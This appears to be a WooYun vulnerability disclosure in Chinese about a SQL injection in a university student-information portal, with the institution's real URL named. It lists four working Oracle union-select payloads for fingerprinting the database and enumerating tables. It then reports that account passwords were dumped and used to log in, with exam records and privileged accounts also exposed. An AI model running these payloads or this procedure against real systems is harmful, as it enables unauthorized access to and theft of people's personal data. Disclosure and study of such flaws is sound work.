WooYun.org

学校个人信息管理系统，通过自己的个人账号登陆直接访问
http://portal.sicnu.edu.cn/eapdomain/然后直接就是下面页面

红框中就是post注入，我测试的这个是oracle数据库
一．123' union select '1','2','3','4','5','6' from dual—-

可以判断是字符型注入
二．123' union select '1',(select banner from sys.v_$version where rownum=1),'3','4','5','6' from dual--

可以判断数据版本
三．123' union select '1',(select member from v$logfile where rownum=1),'3','4','5','6' from dual--

可以通过日志路径知道是linux系统
四．123' union select '1',(select owner from all_tables where rownum=1),'3','4','5','6' from dual

爆库，然后就是各种报表爆数据
最后就是暴数据了

账号 密码出来了
到前台登陆刚爆出来的账号密码，效果：

还有其他考试成绩查询，跟其他权限更高的账号都也可爆出。。。

太多不河蟹的东东啦。。。